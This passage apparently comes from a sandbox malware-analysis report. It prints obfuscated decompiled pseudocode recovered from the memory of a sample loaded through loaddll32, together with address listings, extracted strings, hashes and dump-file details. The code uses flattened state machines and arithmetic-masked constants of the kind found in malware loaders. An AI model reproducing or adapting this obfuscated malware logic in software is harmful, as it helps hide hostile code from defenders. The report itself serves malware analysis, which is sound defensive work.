				_v160 = _v160 ^ 0x710c49d1;
				_v160 = _v160 ^ 0x7106b0fc;
				_v164 = 0xea0060;
				_v164 = _v164 << 2;
				_t826 = 0x54;
				_v164 = _v164 * 0x51;
				_v164 = _v164 ^ 0x2820691f;
				_v212 = 0x1a562c;
				_v212 = _v212 + 0xffff6884;
				_v212 = _v212 / _t826;
				_v212 = _v212 ^ 0x000ca439;
				_v316 = 0xc049a;
				_t827 = 0x4a;
				_v316 = _v316 / _t827;
				_v316 = _v316 >> 0xd;
				_v316 = _v316 >> 0xc;
				_v316 = _v316 ^ 0x000978cf;
				_v120 = 0xbc159f;
				_t828 = 0x75;
				_v120 = _v120 * 0x6f;
				_t829 = 0x3acf932;
				_v120 = _v120 / _t828;
				_v120 = _v120 ^ 0x00bb77de;
				_v128 = 0x83c7e3;
				_v128 = _v128 ^ 0x1c1c3aef;
				_v128 = _v128 ^ 0x03a71d14;
				_v128 = _v128 ^ 0x1f3d9b10;
				while(1) {
					L1:
					while(1) {
						do {
							while(1) {
								L3:
								_t840 = _t740 - 0x6051746;
								if(_t840 <= 0) {
									break;
								}
								__eflags = _t740 - 0x644521d;
								if(_t740 == 0x644521d) {
									E008812C1(_v32, _v136, _v144, _v152, _v160);
									_t740 = 0x4160ee8;
									goto L25;
								} else {
									__eflags = _t740 - 0x8d06406;
									if(_t740 == 0x8d06406) {
										_push(_t746);
										_push(_t746);
										_t715 = E0086C5D8(_v20);
										_t746 = _v224;
										_t834 = _t834 + 0xc;
										__eflags = _t715;
										_v24 = _t715;
										_t798 = 0x26ffc0;
										_t740 =  !=  ? 0x26ffc0 : _t814;
										_t716 = 0x5dc2900;
										continue;
									} else {
										__eflags = _t740 - 0xa8b367c;
										if(__eflags == 0) {
											_t740 = 0x6051746;
											continue;
										} else {
											__eflags = _t740 - 0xc2dfee2;
											if(__eflags == 0) {
												_push(_v276);
												_push(_v236);
												_push(_v320);
												_t737 = E0086F288(_v272, _v280, E0087E1F8(0x8613f8, _v312, __eflags), _v288,  &_v8,  &_v20, _v296, 0x8613f8, _v304, _v28, _v92);
												_t834 = _t834 + 0x30;
												__eflags = _t737 - _v264;
												_t740 =  ==  ? _v16 : _t814;
												E0087FECB(_t734, _v76, _v248, _v256, _v84);
												L16:
												_t829 = 0x3acf932;
												L25:
												_t746 = _v224;
												_t834 = _t834 + 0xc;
												_t798 = 0x26ffc0;
											}
											goto L26;
										}
									}
								}
								L29:
								return _t832;
							}
							if(_t840 == 0) {
								_push(_v228);
								_push(_v180);
								_push(_v80);
								_t717 = E0087E1F8(0x8613a8, _v40, __eflags);
								_push(_v72);
								_push(_v52);
								_push(_v64);
								__eflags = E0086738A(_v132, _t717, _v172, _v108,  &_v28, E0087E1F8(0x861318, _v112, __eflags), _v148) - _v220;
								_t740 =  ==  ? _v12 : 0x1841daf;
								E0087FECB(_t717, _v100, _v200, _v208, _v284);
								_t834 = _t834 + 0x38;
								E0087FECB(_t718, _v176, _v184, _v252, _v192);
								_t814 = 0x30e419;
								goto L16;
							} else {
								if(_t740 == _t798) {
									_t725 = E00861BC9(_v260, _v28, _v300, _v124, _v20, _v188, _v244, _v156, _v24,  &_v32, _v48, _v88);
									_t834 = _t834 + 0x2c;
									__eflags = _t725 - _v292;
									_t746 = _v224;
									_t716 = 0x5dc2900;
									_t740 =  ==  ? 0x5dc2900 : 0x4160ee8;
									goto L3;
								} else {
									if(_t740 == _t814) {
										E0086F7FE(_v120, _v28, _v128, _v232);
									} else {
										if(_t740 == _t829) {
											_t729 = E008622C9(_v308, _v36, _v32, 0x20, _a20, _v140, _v204, _v268);
											_t834 = _t834 + 0x18;
											_t740 = 0x644521d;
											__eflags = _t729 - _v196;
											_t832 =  ==  ? 1 : _t832;
											goto L11;
										} else {
											if(_t740 == 0x4160ee8) {
												E00882B09(_v164, _v24, _v212, _v316);
												_t740 = _t814;
												goto L11;
											} else {
												if(_t740 != _t716) {
													goto L26;
												} else {
													E0087CBE9(_v216, _a12, _v56, _t746, _v104, _v44, _v116, _v32);
													_t834 = _t834 + 0x18;
													_t740 =  ==  ? _t829 : 0x644521d;
													L11:
													_t746 = _v224;
													goto L1;
												}
											}
										}
									}
								}
							}
							goto L29;
							L26:
							__eflags = _t740 - 0x1841daf;
						} while (__eflags != 0);
						goto L29;
					}
				}
			}

0x008657c2
0x008657c9
0x008657cb
0x008657d2
0x008657d6
0x008657dd
0x008657e4
0x008657eb
0x008657f2
0x008657f3
0x008657f5
0x008657fa
0x00865805
0x00865811
0x00865813
0x0086581a
0x0086581f
0x00865828
0x00865833
0x0086583b
0x00865843
0x00865848
0x00865850
0x00865858
0x00865865
0x00865868
0x0086586c
0x00865871
0x00865879
0x00865889
0x0086588d
0x0086589a
0x0086589d
0x008658a1
0x008658a9
0x008658b9
0x008658bd
0x008658c2
0x008658c7
0x008658cf
0x008658da
0x008658ea
0x008658eb
0x008658f2
0x008658fd
0x00865905
0x0086590d
0x00865912
0x00865917
0x0086591f
0x0086592c
0x00865936
0x0086593a
0x00865942
0x0086594d
0x00865958
0x00865963
0x0086596b
0x00865972
0x0086597a
0x0086597f
0x00865987
0x0086599c
0x0086599d
0x008659a4
0x008659ac
0x008659b7
0x008659c5
0x008659c9
0x008659d3
0x008659d7
0x008659df
0x008659ea
0x008659f5
0x00865a00
0x00865a0b
0x00865a13
0x00865a1e
0x00865a29
0x00865a34
0x00865a3f
0x00865a4a
0x00865a52
0x00865a5a
0x00865a62
0x00865a67
0x00865a6f
0x00865a7a
0x00865a85
0x00865a90
0x00865a9b
0x00865aa6
0x00865ab1
0x00865abc
0x00865ac7
0x00865ad2
0x00865ae5
0x00865aec
0x00865af7
0x00865b02
0x00865b12
0x00865b19
0x00865b24
0x00865b2f
0x00865b37
0x00865b42
0x00865b4d
0x00865b58
0x00865b60
0x00865b6b
0x00865b76
0x00865b81
0x00865b89
0x00865b94
0x00865b9f
0x00865baa
0x00865bb5
0x00865bc0
0x00865bcb
0x00865bd6
0x00865be1
0x00865bec
0x00865bf4
0x00865bfc
0x00865c04
0x00865c09
0x00865c11
0x00865c1c
0x00865c27
0x00865c32
0x00865c3d
0x00865c4a
0x00865c52
0x00865c5a
0x00865c65
0x00865c6d
0x00865c75
0x00865c7d
0x00865c85
0x00865c8d
0x00865c98
0x00865ca3
0x00865cab
0x00865cb6
0x00865cbe
0x00865cc6
0x00865cce
0x00865cd6
0x00865cde
0x00865ced
0x00865cee
0x00865cf2
0x00865cfa
0x00865d02
0x00865d0a
0x00865d12
0x00865d1a
0x00865d22
0x00865d2a
0x00865d37
0x00865d3b
0x00865d40
0x00865d45
0x00865d4d
0x00865d55
0x00865d5a
0x00865d5e
0x00865d63
0x00865d6b
0x00865d73
0x00865d78
0x00865d85
0x00865d89
0x00865d91
0x00865d99
0x00865d9e
0x00865da3
0x00865da8
0x00865db0
0x00865db8
0x00865dc2
0x00865dc6
0x00865dcb
0x00865dd3
0x00865dde
0x00865de6
0x00865df1
0x00865dfc
0x00865e07
0x00865e12
0x00865e1a
0x00865e28
0x00865e2c
0x00865e34
0x00865e3c
0x00865e44
0x00865e51
0x00865e55
0x00865e5d
0x00865e65
0x00865e70
0x00865e7b
0x00865e86
0x00865e93
0x00865e9e
0x00865ea6
0x00865eb1
0x00865ebc
0x00865ec4
0x00865ecf
0x00865ed7
0x00865edc
0x00865ee4
0x00865eec
0x00865ef4
0x00865eff
0x00865f09
0x00865f0c
0x00865f13
0x00865f1e
0x00865f2b
0x00865f2f
0x00865f37
0x00865f3b
0x00865f43
0x00865f56
0x00865f66
0x00865f67
0x00865f70
0x00865f7b
0x00865f86
0x00865f8e
0x00865f99
0x00865fa4
0x00865fac
0x00865fb4
0x00865fbc
0x00865fc0
0x00865fc8
0x00865fde
0x00865fe5
0x00865ff0
0x00865ffb
0x00866006
0x00866011
0x0086601c
0x00866027
0x00866032
0x0086603d
0x00866045
0x00866050
0x00866063
0x00866064
0x0086606b
0x00866076
0x00866081
0x0086608c
0x00866097
0x008660a4
0x008660a8
0x008660b0
0x008660b5
0x008660bd
0x008660d0
0x008660d7
0x008660e2
0x008660ed
0x00866102
0x0086610b
0x00866116
0x0086611b
0x00866126
0x00866131
0x0086613c
0x00866147
0x00866152
0x00866165
0x00866168
0x00866173
0x0086617e
0x00866185
0x00866190
0x0086619b
0x008661a6
0x008661b1
0x008661bc
0x008661cf
0x008661d6
0x008661e1
0x008661ec
0x00866202
0x00866209
0x00866214
0x0086621f
0x0086622a
0x0086623a
0x0086623d
0x00866244
0x0086624f
0x0086625a
0x00866270
0x00866277
0x00866282
0x0086628e
0x00866293
0x00866299
0x0086629e
0x008662a3
0x008662ab
0x008662be
0x008662bf
0x008662cf
0x008662d4
0x008662db
0x008662e6
0x008662f1
0x008662fc
0x00866307
0x00866312
0x00866312
0x00866317
0x0086631c
0x0086631c
0x0086631c
0x0086631c
0x00866322
0x00000000
0x00000000
0x00866578
0x0086657e
0x008666b2
0x008666b7
0x00000000
0x00866584
0x00866584
0x0086658a
0x0086665a
0x0086665b
0x00866663
0x00866668
0x0086666f
0x00866672
0x00866674
0x0086667d
0x00866682
0x00866685
0x00000000
0x00866590
0x00866590
0x00866596
0x00866637
0x00000000
0x0086659c
0x0086659c
0x008665a2
0x008665a8
0x008665b1
0x008665b5
0x008665fb
0x00866600
0x0086660b
0x00866616
0x0086662d
0x0086656e
0x0086656e
0x008666bc
0x008666bc
0x008666c3
0x008666cb
0x008666cb
0x00000000
0x008665a2
0x00866596
0x0086658a
0x00866700
0x0086670a
0x0086670a
0x00866328
0x0086648f
0x00866498
0x0086649f
0x008664ad
0x008664bc
0x008664c3
0x008664ca
0x0086651c
0x00866524
0x00866541
0x00866546
0x00866564
0x00866569
0x00000000
0x0086632e
0x00866330
0x00866469
0x00866470
0x0086647c
0x0086647e
0x00866482
0x00866487
0x00000000
0x00866336
0x00866338
0x008666f7
0x0086633e
0x00866340
0x008663fd
0x0086640e
0x00866411
0x00866416
0x00866418
0x00000000
0x00866346
0x0086634c
0x008663c5
0x008663cc
0x00000000
0x0086634e
0x00866350
0x00000000
0x00866356
0x00866388
0x0086638f
0x008663a0
0x008663a3
0x008663a3
0x00000000
0x008663a3
0x00866350
0x0086634c
0x00866340
0x00866338
0x00866330
0x00000000
0x008666d0
0x008666d0
0x008666d0
0x00000000
0x008666dc
0x00866317

Strings

Jm, xrefs: 00865EFF
5 , xrefs: 00865D12
W"j, xrefs: 00866006
2G, xrefs: 00865905
tJP, xrefs: 00865E3C
{4, xrefs: 00865CFA
P_W, xrefs: 00865D6B
`, xrefs: 0086621F
NI5, xrefs: 00865FC8
(INK, xrefs: 00865DE6
W, xrefs: 00865BC0

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: (INK$2G$5 $Jm$NI5$P_W$W"j$`$tJP${4$W
API String ID: 0-4122124823
Opcode ID: ca90daa5e6eb5d63174c0330371dc2dc404b39c958cc79c49613de22c470afb3
Instruction ID: 5b6ccbc786f271441057a6c0c5005f498e22b44d931147e2a8ee03ddd3d2f5f9
Opcode Fuzzy Hash: ca90daa5e6eb5d63174c0330371dc2dc404b39c958cc79c49613de22c470afb3
Instruction Fuzzy Hash: 9D72DD715093818FD779CF65C98AB8BBBE1BBC4304F10891DE2DA86260D7B18559DF43

Uniqueness

Uniqueness Score: -1.00%

Function 0086D14C, Relevance: 14.1, Strings: 11, Instructions: 385
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0086D14C() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				void* _t429;
				intOrPtr _t432;
				intOrPtr _t436;
				signed int _t440;
				void* _t441;
				void* _t459;
				signed int _t468;
				intOrPtr _t469;
				intOrPtr* _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t476;
				signed int* _t477;
				void* _t480;

				_t477 =  &_v1756;
				_v1600 = 0x9247ff;
				_t441 = 0xcb67425;
				_v1600 = _v1600 + 0x9ce;
				_v1600 = _v1600 ^ 0x009251e4;
				_v1720 = 0x31cc78;
				_v1720 = _v1720 ^ 0xe44f8b4e;
				_v1720 = _v1720 | 0xfbe7febf;
				_v1720 = _v1720 ^ 0xfff0ff80;
				_v1612 = 0x6730db;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0xcc36c002;
				_v1668 = 0x7fe6a4;
				_v1668 = _v1668 + 0xffff1494;
				_v1668 = _v1668 ^ 0x091c946b;
				_v1668 = _v1668 ^ 0x09626f51;
				_v1756 = 0x73e886;
				_v1756 = _v1756 | 0xafbdbbdf;
				_v1756 = _v1756 + 0xfe30;
				_v1756 = _v1756 ^ 0xb000fa0f;
				_v1604 = 0x468da6;
				_v1604 = _v1604 + 0xffffc3ca;
				_v1604 = _v1604 ^ 0x00465160;
				_v1592 = 0xd4519;
				_v1592 = _v1592 + 0x934d;
				_v1592 = _v1592 ^ 0x0004ddfc;
				_v1640 = 0x8a1a75;
				_v1640 = _v1640 + 0x87da;
				_v1640 = _v1640 + 0xaa53;
				_v1640 = _v1640 ^ 0x008e8924;
				_v1648 = 0xe80c10;
				_v1648 = _v1648 ^ 0x90af551f;
				_v1648 = _v1648 + 0x6d6d;
				_v1648 = _v1648 ^ 0x90403b69;
				_v1712 = 0x809df1;
				_v1712 = _v1712 << 2;
				_v1712 = _v1712 << 7;
				_v1576 = _v1576 & 0x00000000;
				_v1712 = _v1712 * 0x69;
				_v1712 = _v1712 ^ 0x81832f4f;
				_v1656 = 0xe952a2;
				_v1656 = _v1656 | 0x54fcc54b;
				_v1656 = _v1656 + 0xffff1739;
				_v1656 = _v1656 ^ 0x54fad21b;
				_v1700 = 0xbcdb1b;
				_v1700 = _v1700 + 0xdccd;
				_v1700 = _v1700 + 0xffffcf6f;
				_v1700 = _v1700 ^ 0x00b72c28;
				_v1628 = 0x5c7dad;
				_v1628 = _v1628 >> 5;
				_v1628 = _v1628 + 0x3d87;
				_v1628 = _v1628 ^ 0x000cf9b2;
				_v1660 = 0x2281c9;
				_v1660 = _v1660 * 0x49;
				_v1660 = _v1660 >> 5;
				_v1660 = _v1660 ^ 0x004fb411;
				_v1568 = 0xcd133d;
				_v1568 = _v1568 * 0x4e;
				_v1568 = _v1568 ^ 0x3e7dd872;
				_v1672 = 0x86c6ca;
				_v1672 = _v1672 * 0x5f;
				_v1672 = _v1672 + 0xffff3952;
				_v1672 = _v1672 ^ 0x3200c70e;
				_v1588 = 0x24e2cc;
				_v1588 = _v1588 | 0xcf150453;
				_v1588 = _v1588 ^ 0xcf3ce5d0;
				_v1572 = 0x6249a8;
				_v1572 = _v1572 << 6;
				_v1572 = _v1572 ^ 0x189f8b0c;
				_v1596 = 0x119a44;
				_v1596 = _v1596 >> 8;
				_v1596 = _v1596 ^ 0x000b5fad;
				_v1680 = 0xd16cc2;
				_v1680 = _v1680 ^ 0x4916a611;
				_v1680 = _v1680 >> 0xe;
				_v1680 = _v1680 ^ 0x00055714;
				_v1728 = 0x441d3d;
				_t471 = 0x35;
				_v1728 = _v1728 * 3;
				_v1728 = _v1728 << 3;
				_v1728 = _v1728 | 0x559f2c94;
				_v1728 = _v1728 ^ 0x57fdad3a;
				_v1564 = 0xb1e813;
				_v1564 = _v1564 >> 0xc;
				_v1564 = _v1564 ^ 0x0004104c;
				_v1736 = 0x70197f;
				_v1736 = _v1736 >> 0x10;
				_v1736 = _v1736 + 0xe51d;
				_v1736 = _v1736 * 0x61;
				_v1736 = _v1736 ^ 0x00557f63;
				_v1744 = 0x5ff0e3;
				_v1744 = _v1744 + 0xffff2d97;
				_v1744 = _v1744 + 0xffff9c65;
				_v1744 = _v1744 ^ 0xd07f01de;
				_v1744 = _v1744 ^ 0xd026cc62;
				_v1608 = 0x914f5e;
				_v1608 = _v1608 << 0xf;
				_v1608 = _v1608 ^ 0xa7adba7a;
				_v1664 = 0xe3376f;
				_v1664 = _v1664 >> 8;
				_v1664 = _v1664 << 4;
				_v1664 = _v1664 ^ 0x000bcae6;
				_v1616 = 0x54b2fb;
				_v1616 = _v1616 + 0xce1d;
				_v1616 = _v1616 ^ 0x005b3b7b;
				_v1644 = 0xe2ce3f;
				_v1644 = _v1644 + 0x16f2;
				_v1644 = _v1644 >> 0xd;
				_v1644 = _v1644 ^ 0x000e1e70;
				_v1752 = 0x7f4aca;
				_v1752 = _v1752 ^ 0x883f1d9d;
				_v1752 = _v1752 + 0x59a5;
				_v1752 = _v1752 | 0x80ddc91b;
				_v1752 = _v1752 ^ 0x88d3833c;
				_v1636 = 0xc2c2cf;
				_v1636 = _v1636 / _t471;
				_v1636 = _v1636 + 0xffff5d17;
				_v1636 = _v1636 ^ 0x0005a2c5;
				_v1676 = 0x4604e2;
				_v1676 = _v1676 * 0x76;
				_v1676 = _v1676 + 0xdac5;
				_v1676 = _v1676 ^ 0x2048b942;
				_v1652 = 0x890d36;
				_v1652 = _v1652 >> 3;
				_v1652 = _v1652 | 0xfe9d52c1;
				_v1652 = _v1652 ^ 0xfe9ab4fb;
				_v1684 = 0xd96cde;
				_v1684 = _v1684 * 0x47;
				_v1684 = _v1684 + 0xffff480a;
				_v1684 = _v1684 ^ 0x3c48c040;
				_v1624 = 0xc48732;
				_v1624 = _v1624 >> 4;
				_v1624 = _v1624 ^ 0x01665cbd;
				_v1624 = _v1624 ^ 0x016df620;
				_v1692 = 0x58f5b8;
				_v1692 = _v1692 << 4;
				_v1692 = _v1692 ^ 0x299232ca;
				_v1692 = _v1692 ^ 0x2c1b7361;
				_v1732 = 0x9987b4;
				_v1732 = _v1732 << 4;
				_v1732 = _v1732 ^ 0x14505727;
				_v1732 = _v1732 | 0xbadb6758;
				_v1732 = _v1732 ^ 0xbfd57076;
				_v1708 = 0x151e5;
				_v1708 = _v1708 >> 0xd;
				_v1708 = _v1708 >> 0xe;
				_v1708 = _v1708 + 0xffff12c7;
				_v1708 = _v1708 ^ 0xffff0a0d;
				_v1580 = 0x15a9fb;
				_v1580 = _v1580 >> 6;
				_v1580 = _v1580 ^ 0x0004a695;
				_v1688 = 0x871746;
				_t472 = 0x34;
				_v1688 = _v1688 / _t472;
				_v1688 = _v1688 + 0xffff07ae;
				_v1688 = _v1688 ^ 0x00087c5e;
				_v1740 = 0xe3d16b;
				_v1740 = _v1740 << 7;
				_v1740 = _v1740 | 0x6cb9ee1d;
				_v1740 = _v1740 ^ 0x38143ac0;
				_v1740 = _v1740 ^ 0x45e6e926;
				_v1724 = 0xe03c47;
				_v1724 = _v1724 + 0x7497;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 + 0xffff69be;
				_v1724 = _v1724 ^ 0x2c306d9d;
				_v1748 = 0xe2efab;
				_v1748 = _v1748 | 0x110de103;
				_v1748 = _v1748 + 0x3577;
				_t473 = 0x2b;
				_t440 = _v1576;
				_v1748 = _v1748 / _t473;
				_v1748 = _v1748 ^ 0x006272f3;
				_v1716 = 0x295420;
				_v1716 = _v1716 ^ 0xaa3d2c48;
				_v1716 = _v1716 + 0xffff3248;
				_v1716 = _v1716 ^ 0xb95b2034;
				_v1716 = _v1716 ^ 0x134f16e6;
				_v1620 = 0x315b6e;
				_v1620 = _v1620 ^ 0xed866512;
				_v1620 = _v1620 ^ 0xedb02c8f;
				_v1696 = 0xb25998;
				_t476 = _v1576;
				_t468 = _v1576;
				_v1696 = _v1696 * 0xf;
				_v1696 = _v1696 << 9;
				_v1696 = _v1696 ^ 0xe675be87;
				_v1632 = 0x9ab851;
				_v1632 = _v1632 ^ 0x37be7fac;
				_v1632 = _v1632 + 0xffff726f;
				_v1632 = _v1632 ^ 0x372cadd5;
				_v1704 = 0xe98d3;
				_v1704 = _v1704 | 0xb808fc66;
				_v1704 = _v1704 ^ 0xb98541de;
				_v1704 = _v1704 | 0x92c26071;
				_v1704 = _v1704 ^ 0x93ce4092;
				_v1584 = 0x695255;
				_v1584 = _v1584 | 0x2c3ea780;
				_v1584 = _v1584 ^ 0x2c75cea7;
				while(1) {
					L1:
					while(1) {
						_t459 = 0x5c;
						do {
							while(1) {
								L3:
								_t480 = _t441 - 0xc1f8872;
								if(_t480 > 0) {
									break;
								}
								if(_t480 == 0) {
									E00863046(_v1696, _v1632, _v1704, _t440, _v1584);
								} else {
									if(_t441 == 0x1770085) {
										_t476 = E00877C4E(_t440, _t459, _t441, _v1644, _v1752, _v1668, _v1636, _v1676, _v1756, _v1652, _t468, _v1684, _v1604, _v1624, _t441, _v1692, _t441, _v1732, _t441, _t468, _v1708,  &_v1560, _v1580, _v1612);
										_t477 =  &(_t477[0x16]);
										__eflags = _t476;
										if(_t476 == 0) {
											goto L10;
										} else {
											_t441 = 0x650cb13;
											_v1576 = 1;
											while(1) {
												_t459 = 0x5c;
												goto L3;
											}
										}
									} else {
										if(_t441 == 0x30ba806) {
											_t469 =  *0x886214; // 0x0
											_t470 = _t469 + 0x23c;
											while(1) {
												__eflags =  *_t470 - _t459;
												if( *_t470 == _t459) {
													break;
												}
												_t470 = _t470 + 2;
												__eflags = _t470;
											}
											_t468 = _t470 + 2;
											_t441 = 0xd1695f5;
											continue;
										} else {
											if(_t441 == 0x650cb13) {
												E0087B257(_t440, _v1688, _v1740, _t476);
												_t441 = 0x8b9ab05;
												while(1) {
													_t459 = 0x5c;
													goto L3;
												}
											} else {
												if(_t441 != 0x8b9ab05) {
													goto L25;
												} else {
													_t352 =  &_v1748; // 0x45e6e926
													E00863046(_v1724,  *_t352, _v1716, _t476, _v1620);
													_t477 =  &(_t477[3]);
													L10:
													_t441 = 0xc1f8872;
													while(1) {
														_t459 = 0x5c;
														goto L3;
													}
												}
											}
										}
									}
								}
								L28:
								return _v1576;
							}
							__eflags = _t441 - 0xcb67425;
							if(_t441 == 0xcb67425) {
								E00861A34(_v1592,  &_v520, _t441, _t441, _v1640, _v1648, _v1712, _t441, _v1600, _v1656);
								_t477 =  &(_t477[8]);
								_t441 = 0xd521465;
								_t459 = 0x5c;
								goto L25;
							} else {
								__eflags = _t441 - 0xd1695f5;
								if(_t441 == 0xd1695f5) {
									_t440 = E0087E8B6(_t441, _v1608, _v1664, _t441, _v1720, _v1616);
									_t477 =  &(_t477[4]);
									__eflags = _t440;
									if(_t440 != 0) {
										_t441 = 0x1770085;
										_t459 = 0x5c;
										goto L3;
									}
								} else {
									__eflags = _t441 - 0xd521465;
									if(__eflags != 0) {
										goto L25;
									} else {
										_push(_v1568);
										_push(_v1660);
										_push(_v1628);
										_t429 = E0087E1F8(0x861030, _v1700, __eflags);
										E00867078( &_v1040, __eflags);
										_t432 =  *0x886214; // 0x0
										_t436 =  *0x886214; // 0x0
										E0086F96F(_v1672, __eflags, _t436 + 0x34, _t429,  &_v1040, _v1588,  &_v1560, _t432 + 0x23c, _v1572, _v1596, _v1680,  &_v520);
										E0087FECB(_t429, _v1728, _v1564, _v1736, _v1744);
										_t477 =  &(_t477[0x10]);
										_t441 = 0x30ba806;
										goto L1;
									}
								}
							}
							goto L28;
							L25:
							__eflags = _t441 - 0x3fe9fd3;
						} while (_t441 != 0x3fe9fd3);
						goto L28;
					}
				}
			}

0x0086d14c
0x0086d156
0x0086d161
0x0086d166
0x0086d171
0x0086d17c
0x0086d184
0x0086d18c
0x0086d194
0x0086d19c
0x0086d1a7
0x0086d1af
0x0086d1ba
0x0086d1c2
0x0086d1ca
0x0086d1d2
0x0086d1da
0x0086d1e2
0x0086d1ea
0x0086d1f2
0x0086d1fa
0x0086d205
0x0086d210
0x0086d21b
0x0086d226
0x0086d231
0x0086d23c
0x0086d247
0x0086d252
0x0086d25d
0x0086d268
0x0086d270
0x0086d278
0x0086d280
0x0086d288
0x0086d290
0x0086d295
0x0086d29f
0x0086d2a7
0x0086d2ab
0x0086d2b3
0x0086d2bb
0x0086d2c3
0x0086d2cb
0x0086d2d3
0x0086d2db
0x0086d2e3
0x0086d2eb
0x0086d2f3
0x0086d2fe
0x0086d306
0x0086d311
0x0086d31c
0x0086d329
0x0086d32d
0x0086d332
0x0086d33a
0x0086d34d
0x0086d354
0x0086d35f
0x0086d36c
0x0086d370
0x0086d378
0x0086d380
0x0086d38b
0x0086d396
0x0086d3a1
0x0086d3ac
0x0086d3b4
0x0086d3bf
0x0086d3ca
0x0086d3d2
0x0086d3dd
0x0086d3e5
0x0086d3ed
0x0086d3f4
0x0086d3fc
0x0086d40b
0x0086d40c
0x0086d410
0x0086d415
0x0086d41d
0x0086d425
0x0086d430
0x0086d438
0x0086d443
0x0086d44b
0x0086d450
0x0086d45d
0x0086d461
0x0086d469
0x0086d471
0x0086d479
0x0086d481
0x0086d489
0x0086d491
0x0086d49c
0x0086d4a4
0x0086d4af
0x0086d4b7
0x0086d4bc
0x0086d4c1
0x0086d4c9
0x0086d4d4
0x0086d4df
0x0086d4ea
0x0086d4f5
0x0086d500
0x0086d508
0x0086d513
0x0086d51b
0x0086d523
0x0086d52b
0x0086d533
0x0086d53b
0x0086d54f
0x0086d556
0x0086d561
0x0086d56c
0x0086d579
0x0086d57d
0x0086d585
0x0086d58d
0x0086d595
0x0086d59a
0x0086d5a2
0x0086d5aa
0x0086d5b7
0x0086d5bb
0x0086d5c3
0x0086d5cb
0x0086d5d6
0x0086d5de
0x0086d5e9
0x0086d5f4
0x0086d5fc
0x0086d601
0x0086d609
0x0086d611
0x0086d619
0x0086d61e
0x0086d626
0x0086d62e
0x0086d636
0x0086d63e
0x0086d643
0x0086d648
0x0086d650
0x0086d65a
0x0086d665
0x0086d66d
0x0086d678
0x0086d686
0x0086d68b
0x0086d691
0x0086d699
0x0086d6a1
0x0086d6a9
0x0086d6ae
0x0086d6b6
0x0086d6be
0x0086d6c6
0x0086d6ce
0x0086d6d6
0x0086d6db
0x0086d6e3
0x0086d6eb
0x0086d6f3
0x0086d6fb
0x0086d707
0x0086d70a
0x0086d711
0x0086d715
0x0086d71d
0x0086d725
0x0086d72d
0x0086d735
0x0086d73d
0x0086d745
0x0086d750
0x0086d75b
0x0086d766
0x0086d773
0x0086d77a
0x0086d781
0x0086d785
0x0086d78a
0x0086d792
0x0086d79d
0x0086d7a8
0x0086d7b3
0x0086d7be
0x0086d7c6
0x0086d7ce
0x0086d7d6
0x0086d7de
0x0086d7e6
0x0086d7f1
0x0086d7fc
0x0086d807
0x0086d807
0x0086d80c
0x0086d80e
0x0086d80f
0x0086d80f
0x0086d80f
0x0086d80f
0x0086d811
0x00000000
0x00000000
0x0086d817
0x0086da90
0x0086d81d
0x0086d823
0x0086d90c
0x0086d90e
0x0086d911
0x0086d913
0x00000000
0x0086d919
0x0086d919
0x0086d91e
0x0086d80c
0x0086d80e
0x00000000
0x0086d80e
0x0086d80c
0x0086d825
0x0086d82b
0x0086d87a
0x0086d880
0x0086d88b
0x0086d88b
0x0086d88e
0x00000000
0x00000000
0x0086d888
0x0086d888
0x0086d888
0x0086d890
0x0086d893
0x00000000
0x0086d82d
0x0086d833
0x0086d86c
0x0086d873
0x0086d80c
0x0086d80e
0x00000000
0x0086d80e
0x0086d835
0x0086d83b
0x00000000
0x0086d841
0x0086d84d
0x0086d855
0x0086d85a
0x0086d85d
0x0086d85d
0x0086d80c
0x0086d80e
0x00000000
0x0086d80e
0x0086d80c
0x0086d83b
0x0086d833
0x0086d82b
0x0086d823
0x0086da98
0x0086daa9
0x0086daa9
0x0086d92e
0x0086d934
0x0086da5b
0x0086da60
0x0086da63
0x0086da6a
0x00000000
0x0086d93a
0x0086d93a
0x0086d940
0x0086da1a
0x0086da1c
0x0086da1f
0x0086da21
0x0086da23
0x0086d80e
0x00000000
0x0086d80e
0x0086d946
0x0086d946
0x0086d94c
0x00000000
0x0086d952
0x0086d952
0x0086d95e
0x0086d962
0x0086d96d
0x0086d97b
0x0086d99f
0x0086d9c8
0x0086d9d2
0x0086d9ec
0x0086d9f1
0x0086d9f4
0x00000000
0x0086d9f4
0x0086d94c
0x0086d940
0x00000000
0x0086da6b
0x0086da6b
0x0086da6b
0x00000000
0x0086da77
0x0086d80c

Strings

URi, xrefs: 0086D7E6
&E, xrefs: 0086D84D
mm, xrefs: 0086D278
n[1, xrefs: 0086D745
o7, xrefs: 0086D4AF
T), xrefs: 0086D71D
G<, xrefs: 0086D6C6
{;[, xrefs: 0086D4DF
w5, xrefs: 0086D6FB
`QF, xrefs: 0086D210
Qob, xrefs: 0086D1D2

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

